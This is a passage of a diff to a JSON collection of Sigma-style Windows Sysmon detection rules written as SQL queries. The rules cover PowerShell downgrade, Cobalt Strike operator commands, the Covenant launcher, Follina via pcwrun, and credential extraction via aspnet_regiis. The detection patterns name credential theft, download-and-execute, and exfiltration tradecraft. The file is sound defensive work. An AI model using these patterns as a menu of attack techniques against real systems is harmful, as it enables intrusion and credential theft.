"description": "Detects a \"dllhost\" process spawning with no commandline arguments which is very rare to happen and could indicate process injection activity or malware mimicking similar system processes.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential PowerShell Downgrade Attack", + "id": "b3512211-c67e-4707-bedc-66efc7848863", + "status": "test", + "description": "Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0", + "author": "Harish Segar (rule)", "tags": [ "attack.defense_evasion", - "attack.t1055" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%dllhost.exe' ESCAPE '\\' AND Image LIKE '%\\\\dllhost.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\powershell.exe' ESCAPE '\\' AND (CommandLine LIKE '% -version 2 %' ESCAPE '\\' OR CommandLine LIKE '% -versio 2 %' ESCAPE '\\' OR CommandLine LIKE '% -versi 2 %' ESCAPE '\\' OR CommandLine LIKE '% -vers 2 %' ESCAPE '\\' OR CommandLine LIKE '% -ver 2 %' ESCAPE '\\' OR CommandLine LIKE '% -ve 2 %' ESCAPE '\\' OR CommandLine LIKE '% -v 2 %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_dllhost_no_cli_execution.yml" + "filename": "proc_creation_win_powershell_downgrade_attack.yml" }, { - "title": "Suspicious Rundll32 Invoking Inline VBScript", - "id": "1cc50f3f-1fc8-4acf-b2e9-6f172e1fdebd", + "title": "Suspicious Desktopimgdownldr Command", + "id": "bb58aa4a-b80b-415a-a2c0-2f65a4c81009", "status": "test", - "description": "Detects suspicious process related to rundll32 based on command line that invokes inline VBScript as seen being used by UNC2452", + "description": "Detects a suspicious Microsoft desktopimgdownldr execution with parameters used to download files from the Internet", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1055" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Unknown" + "False positives depend on scripts and administrative tools used in the monitored environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND CommandLine LIKE '%Execute%' ESCAPE '\\' AND CommandLine LIKE '%RegRead%' ESCAPE '\\' AND CommandLine LIKE '%window.close%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '% /lockscreenurl:%' ESCAPE '\\' AND NOT ((CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.jpeg%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\'))) OR (CommandLine LIKE '%reg delete%' ESCAPE '\\' AND CommandLine LIKE '%\\\\PersonalizationCSP%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_inline_vbs.yml" + "filename": "proc_creation_win_desktopimgdownldr_susp_execution.yml" }, { - "title": "Conhost.exe CommandLine Path Traversal", - "id": "ee5e119b-1f75-4b34-add8-3be976961e39", - "status": "experimental", - "description": "detects the usage of path traversal in conhost.exe indicating possible command/argument confusion/hijacking", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "TropicTrooper Campaign November 2018", + "id": "8c7090c3-e0a0-4944-bd08-08c3a0cecf79", + "status": "stable", + "description": "Detects TropicTrooper activity, an actor who targeted high-profile organizations in the energy and food and beverage sectors in Asia", + "author": "@41thexplorer, Microsoft Defender ATP", "tags": [ "attack.execution", - "attack.t1059.003" - ], - "falsepositives": [ - "Unlikely" + "attack.t1059.001" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentCommandLine LIKE '%conhost%' ESCAPE '\\' AND CommandLine LIKE '%/../../%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%abCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCc%' ESCAPE '\\')" ], - "filename": "proc_creation_win_conhost_path_traversal.yml" + "filename": "proc_creation_win_apt_tropictrooper.yml" }, { - "title": "Regedit as Trusted Installer", - "id": "883835a7-df45-43e4-bf1d-4268768afda4", - "status": "test", - "description": "Detects a regedit started with TrustedInstaller privileges or by ProcessHacker.exe", - "author": "Florian Roth (Nextron Systems)", + "title": "VsCode Child Process Anomaly", + "id": "5a3164f2-b373-4152-93cf-090b13c12d27", + "status": "experimental", + "description": "Detects uncommon or suspicious child processes spawning from a VsCode \"code.exe\" process. This could indicate an attempt of persistence via VsCode tasks or terminal profiles.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1548" + "attack.execution", + "attack.defense_evasion", + "attack.t1218", + "attack.t1202" ], "falsepositives": [ - "Unlikely" + "In development environment where VsCode is used heavily. False positives may occur when developers use task to compile or execute different types of code. Remove or add processes accordingly" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\regedit.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\TrustedInstaller.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ProcessHacker.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\code.exe' ESCAPE '\\' AND ((Image LIKE '%\\\\calc.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\') OR ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%Invoke-Expressions%' ESCAPE '\\' OR CommandLine LIKE '%IEX%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Command%' ESCAPE '\\' OR CommandLine LIKE '%ICM%' ESCAPE '\\' OR CommandLine LIKE '%DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\')) OR (Image LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_regedit_trustedinstaller.yml" + "filename": "proc_creation_win_vscode_child_processes_anomalies.yml" }, { - "title": "LOLBAS Data Exfiltration by DataSvcUtil.exe", - "id": "e290b10b-1023-4452-a4a9-eb31a9013b3a", + "title": "PowerShell Script Run in AppData", + "id": "ac175779-025a-4f12-98b0-acdaeb77ea85", "status": "experimental", - "description": "Detects when a user performs data exfiltration by using DataSvcUtil.exe", - "author": "Ialle Teixeira @teixeira0xfffff, Austin Songer @austinsonger", + "description": "Detects a suspicious command line execution that invokes PowerShell with reference to an AppData folder", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.exfiltration", - "attack.t1567" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "DataSvcUtil.exe being used may be performed by a system administrator.", - "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "DataSvcUtil.exe being executed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + "Administrative scripts" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%/in:%' ESCAPE '\\' OR CommandLine LIKE '%/out:%' ESCAPE '\\' OR CommandLine LIKE '%/uri:%' ESCAPE '\\') AND (Image LIKE '%\\\\DataSvcUtil.exe' ESCAPE '\\' OR OriginalFileName = 'DataSvcUtil.exe'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%powershell.exe%' ESCAPE '\\' OR CommandLine LIKE '%\\\\powershell%' ESCAPE '\\' OR CommandLine LIKE '%\\\\pwsh%' ESCAPE '\\' OR CommandLine LIKE '%pwsh.exe%' ESCAPE '\\') AND CommandLine LIKE '%/c %' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Roaming\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_data_exfiltration_by_using_datasvcutil.yml" + "filename": "proc_creation_win_powershell_susp_ps_appdata.yml" }, { - "title": "Operator Bloopers Cobalt Strike Commands", - "id": "647c7b9e-d784-4fda-b9a0-45c565a7b729", + "title": "Microsoft IIS Connection Strings Decryption", + "id": "97dbf6e2-e436-44d8-abee-4261b24d3e41", "status": "experimental", - "description": "Detects use of Cobalt Strike commands accidentally entered in the CMD shell", - "author": "_pete_0, TheDFIRReport", + "description": "Detects use of aspnet_regiis to decrypt Microsoft IIS connection strings. An attacker with Microsoft IIS web server access via a webshell or alike can decrypt and dump any hardcoded connection strings, such as the MSSQL service account password using aspnet_regiis command.", + "author": "Tim Rauch", "tags": [ - "attack.execution", - "attack.t1059.003" + "attack.credential_access", + "attack.t1003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'Cmd.Exe' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') AND ((CommandLine LIKE 'cmd %' ESCAPE '\\' OR CommandLine LIKE 'cmd.exe%' ESCAPE '\\' OR CommandLine LIKE 'c:\\\\windows\\\\system32\\\\cmd.exe%' ESCAPE '\\') AND (CommandLine LIKE '%psinject%' ESCAPE '\\' OR CommandLine LIKE '%spawnas%' ESCAPE '\\' OR CommandLine LIKE '%make\\_token%' ESCAPE '\\' OR CommandLine LIKE '%remote-exec%' ESCAPE '\\' OR CommandLine LIKE '%rev2self%' ESCAPE '\\' OR CommandLine LIKE '%dcsync%' ESCAPE '\\' OR CommandLine LIKE '%logonpasswords%' ESCAPE '\\' OR CommandLine LIKE '%execute-assembly%' ESCAPE '\\' OR CommandLine LIKE '%getsystem%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\aspnet\\_regiis.exe' ESCAPE '\\' OR OriginalFileName LIKE 'aspnet\\_regiis.exe' ESCAPE '\\') AND (CommandLine LIKE '%connectionStrings%' ESCAPE '\\' AND CommandLine LIKE '% -pdf%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_cobaltstrike_bloopers_cmd.yml" + "filename": "proc_creation_win_iis_connection_strings_decryption.yml" }, { - "title": "Raccine Uninstall", - "id": "a31eeaed-3fd5-478e-a8ba-e62c6b3f9ecc", - "status": "test", - "description": "Detects commands that indicate a Raccine removal from an end system. Raccine is a free ransomware protection tool.", - "author": "Florian Roth (Nextron Systems)", + "title": "Renamed BrowserCore.EXE Execution", + "id": "8a4519e8-e64a-40b6-ae85-ba8ad2177559", + "status": "experimental", + "description": "Detects process creation with a renamed BrowserCore.exe (used to extract Azure tokens)", + "author": "Max Altgelt (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.t1528", + "attack.t1036.003" ], "falsepositives": [ - "Legitimate deinstallation by administrative staff" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%taskkill %' ESCAPE '\\' AND CommandLine LIKE '%RaccineSettings.exe%' ESCAPE '\\') OR (CommandLine LIKE '%reg.exe%' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%Raccine Tray%' ESCAPE '\\') OR (CommandLine LIKE '%schtasks%' ESCAPE '\\' AND CommandLine LIKE '%/DELETE%' ESCAPE '\\' AND CommandLine LIKE '%Raccine Rules Updater%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'BrowserCore.exe' AND NOT ((Image LIKE '%\\\\BrowserCore.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_disable_raccine.yml" + "filename": "proc_creation_win_renamed_browsercore.yml" }, { - "title": "WmiPrvSE Spawned A Process", - "id": "d21374ff-f574-44a7-9998-4a8c8bf33d7d", - "status": "stable", - "description": "Detects wmiprvse spawning processes", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "title": "WhoAmI as Parameter", + "id": "e9142d84-fbe0-401d-ac50-3e519fb00c89", + "status": "test", + "description": "Detects a suspicious process command line that uses whoami as first parameter (as e.g. used by EfsPotato)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1047" + "attack.discovery", + "attack.t1033", + "car.2016-03-001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\WmiPrvSe.exe' ESCAPE '\\' AND NOT ((LogonId IN ('0x3e7', 'null') OR (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') OR (Image LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR Image LIKE '%\\\\WerFault.exe' ESCAPE '\\')) OR (LogonId = '')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%.exe whoami%' ESCAPE '\\')" ], - "filename": "proc_creation_win_wmiprvse_spawning_process.yml" + "filename": "proc_creation_win_susp_whoami_as_param.yml" }, { - "title": "Potential Suspicious Child Process Of 3CXDesktopApp", - "id": "63f3605b-979f-48c2-b7cc-7f90523fed88", + "title": "Suspicious Serv-U Process Pattern", + "id": "58f4ea09-0fc2-4520-ba18-b85c540b0eaf", "status": "experimental", - "description": "Detects potential suspicious child processes of \"3CXDesktopApp.exe\". Which could be related to the 3CXDesktopApp supply chain compromise", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects a suspicious process pattern which could be a sign of an exploited Serv-U service", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.execution", - "attack.t1218" + "attack.credential_access", + "attack.t1555", + "cve.2021.35211" ], "falsepositives": [ - "Unknown" + "Legitimate uses in which users or programs use the SSH service of Serv-U for remote command execution" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\3CXDesktopApp.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\Serv-U.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_3cx_compromise_susp_children.yml" + "filename": "proc_creation_win_servu_susp_child_process.yml" }, { - "title": "Modify Group Policy Settings", - "id": "ada4b0c4-758b-46ac-9033-9004613a150d", + "title": "Execute Pcwrun.EXE To Leverage Follina", + "id": "6004abd0-afa4-4557-ba90-49d172e0a299", "status": "experimental", - "description": "Detect malicious GPO modifications can be used to implement many other malicious behaviors.", - "author": "frack113", + "description": "Detects indirect command execution via Program Compatibility Assistant \"pcwrun.exe\" leveraging the follina (CVE-2022-30190) vulnerability", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1484.001" + "attack.t1218", + "attack.execution" ], "falsepositives": [ - "Legitimate use" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND CommandLine LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System%' ESCAPE '\\' AND (CommandLine LIKE '%GroupPolicyRefreshTimeDC%' ESCAPE '\\' OR CommandLine LIKE '%GroupPolicyRefreshTimeOffsetDC%' ESCAPE '\\' OR CommandLine LIKE '%GroupPolicyRefreshTime%' ESCAPE '\\' OR CommandLine LIKE '%GroupPolicyRefreshTimeOffset%' ESCAPE '\\' OR CommandLine LIKE '%EnableSmartScreen%' ESCAPE '\\' OR CommandLine LIKE '%ShellSmartScreenLevel%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\pcwrun.exe' ESCAPE '\\' AND CommandLine LIKE '%../%' ESCAPE '\\')" ], - "filename": "proc_creation_win_reg_modify_group_policy_settings.yml" + "filename": "proc_creation_win_lolbin_pcwrun_follina.yml" }, { - "title": "Run PowerShell Script from Redirected Input Stream", - "id": "c83bf4b5-cdf0-437c-90fa-43d734f7c476", + "title": "Start Windows Service Via Net.EXE", + "id": "2a072a96-a086-49fa-bcb5-15cc5a619093", "status": "test", - "description": "Detects PowerShell script execution via input stream redirect", - "author": "Moriarty Meng (idea), Anton Kutepov (rule), oscd.community", + "description": "Detects the usage of the \"net.exe\" command to start a service using the \"start\" flag", + "author": "Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.defense_evasion", "attack.execution", - "attack.t1059" + "attack.t1569.002" ], "falsepositives": [ - "Unknown" + "Legitimate administrator or user executes a service for legitimate reasons." ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '\\s-\\s*<')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND CommandLine LIKE '% start %' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_run_script_from_input_stream.yml" + "filename": "proc_creation_win_net_start_service.yml" }, { - "title": "AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl", - "id": "074e0ded-6ced-4ebd-8b4d-53f55908119d", + "title": "HackTool - Covenant PowerShell Launcher", + "id": "c260b6db-48ba-4b4a-a76f-2f67644e99d2", "status": "test", - "description": "Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed)", - "author": "Julia Fomina, oscd.community", + "description": "Detects suspicious command lines used in Covenant luanchers", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", "tags": [ + "attack.execution", "attack.defense_evasion", - "attack.t1216" - ], - "falsepositives": [ - "Unlikely" + "attack.t1059.001", + "attack.t1564.003" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%winrm%' ESCAPE '\\' AND (CommandLine LIKE '%format:pretty%' ESCAPE '\\' OR CommandLine LIKE '%format:\"pretty\"%' ESCAPE '\\' OR CommandLine LIKE '%format:\"text\"%' ESCAPE '\\' OR CommandLine LIKE '%format:text%' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%-Sta%' ESCAPE '\\' AND CommandLine LIKE '%-Nop%' ESCAPE '\\' AND CommandLine LIKE '%-Window%' ESCAPE '\\' AND CommandLine LIKE '%Hidden%' ESCAPE '\\' AND (CommandLine LIKE '%-Command%' ESCAPE '\\' OR CommandLine LIKE '%-EncodedCommand%' ESCAPE '\\')) OR (CommandLine LIKE '%sv o (New-Object IO.MemorySteam);sv d %' ESCAPE '\\' OR CommandLine LIKE '%mshta file.hta%' ESCAPE '\\' OR CommandLine LIKE '%GruntHTTP%' ESCAPE '\\' OR CommandLine LIKE '%-EncodedCommand cwB2ACAAbwAgA%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_winrm_awl_bypass.yml" + "filename": "proc_creation_win_hktl_covenant.yml" }, { - "title": "Execute From Alternate Data Streams", - "id": "7f43c430-5001-4f8b-aaa9-c3b88f18fa5c", + "title": "Suspicious Splwow64 Without Params", + "id": "1f1a8509-2cbb-44f5-8751-8e1571518ce2", "status": "test", - "description": "Detects execution from an Alternate Data Stream (ADS). Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection", - "author": "frack113", + "description": "Detects suspicious Splwow64.exe process without any command line parameters", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1564.004" + "attack.t1202" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CommandLine LIKE '%txt:%' ESCAPE '\\' AND ((CommandLine LIKE '%type %' ESCAPE '\\' AND CommandLine LIKE '% > %' ESCAPE '\\') OR (CommandLine LIKE '%makecab %' ESCAPE '\\' AND CommandLine LIKE '%.cab%' ESCAPE '\\') OR (CommandLine LIKE '%reg %' ESCAPE '\\' AND CommandLine LIKE '% export %' ESCAPE '\\') OR (CommandLine LIKE '%regedit %' ESCAPE '\\' AND CommandLine LIKE '% /E %' ESCAPE '\\') OR (CommandLine LIKE '%esentutl %' ESCAPE '\\' AND CommandLine LIKE '% /y %' ESCAPE '\\' AND CommandLine LIKE '% /d %' ESCAPE '\\' AND CommandLine LIKE '% /o %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\splwow64.exe' ESCAPE '\\' AND CommandLine LIKE '%splwow64.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_alternate_data_streams.yml" + "filename": "proc_creation_win_splwow64_cli_anomaly.yml" }, { - "title": "Suspicious Csi.exe Usage", - "id": "40b95d31-1afc-469e-8d34-9a3a667d058e", + "title": "Suspicious Shells Spawned by Java", + "id": "0d34ed8b-1c12-4ff2-828c-16fc860b766d", "status": "experimental", - "description": "Csi.exe is a signed binary from Microsoft that comes with Visual Studio and provides C# interactive capabilities. It can be used to run C# code from a file passed as a parameter in command line. Early version of this utility provided with Microsoft “Roslyn” Community Technology Preview was named 'rcsi.exe'", - "author": "Konstantin Grishchenko, oscd.community", + "description": "Detects suspicious shell spawned from Java host process (e.g. log4j exploitation)", + "author": "Andreas Hunkeler (@Karneades), Florian Roth", "tags": [ - "attack.execution", - "attack.t1072", - "attack.defense_evasion", - "attack.t1218" + "attack.initial_access", + "attack.persistence", + "attack.privilege_escalation" ], "falsepositives": [ - "Legitimate usage by software developers" + "Legitimate calls to system binaries", + "Company specific internal usage" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\csi.exe' ESCAPE '\\' OR Image LIKE '%\\\\rcsi.exe' ESCAPE '\\') OR OriginalFileName IN ('csi.exe', 'rcsi.exe')) AND Company = 'Microsoft Corporation')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' AND (Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR Image LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR Image LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\query.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_csi_execution.yml" + "filename": "proc_creation_win_java_susp_child_process.yml" }, { - "title": "Potential RDP Session Hijacking Activity", - "id": "224f140f-3553-4cd1-af78-13d81bf9f7cc", + "title": "Arbitrary Binary Execution Using GUP Utility", + "id": "d65aee4d-2292-4cea-b832-83accd6cfa43", "status": "experimental", - "description": "Detects potential RDP Session Hijacking activity on Windows systems", - "author": "@juju4", + "description": "Detects execution of the Notepad++ updater (gup) to launch other commands or executables", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution" ], "falsepositives": [ - "Administrative activity" + "Other parent binaries using GUP not currently identified" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\tscon.exe' ESCAPE '\\' OR OriginalFileName = 'tscon.exe') AND IntegrityLevel = 'SYSTEM')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\gup.exe' ESCAPE '\\' AND Image LIKE '%\\\\explorer.exe' ESCAPE '\\') AND NOT ((Image LIKE '%\\\\explorer.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\Notepad++\\\\notepad++.exe%' ESCAPE '\\') OR (ParentImage LIKE '%\\\\Notepad++\\\\updater\\\\%' ESCAPE '\\') OR (CommandLine = '')))" ], - "filename": "proc_creation_win_tscon_rdp_session_hijacking.yml" + "filename": "proc_creation_win_gup_arbitrary_binary_execution.yml" }, { - "title": "UAC Bypass Using Disk Cleanup", - "id": "b697e69c-746f-4a86-9f59-7bfff8eab881", + "title": "Suspicious CodePage Switch Via CHCP", + "id": "c7942406-33dd-4377-a564-0f62db0593a3", "status": "test", - "description": "Detects the pattern of UAC Bypass using scheduled tasks and variable expansion of cleanmgr.exe (UACMe 34)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects a code page switch in command line or batch scripts to a rare language", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", 